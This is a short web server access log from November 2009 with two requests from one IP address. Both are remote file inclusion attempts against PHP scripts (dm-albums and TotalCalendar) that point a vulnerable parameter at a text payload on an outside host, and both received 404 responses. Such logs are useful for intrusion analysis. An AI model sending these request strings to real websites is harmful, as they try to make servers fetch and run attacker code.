222.122.46.179 - - [01/Nov/2009:00:59:48 -0400] "GET /logs/access_log.Q109101400///dm-albums/template/album.php?SECURITY_FILE=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:00:59:50 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
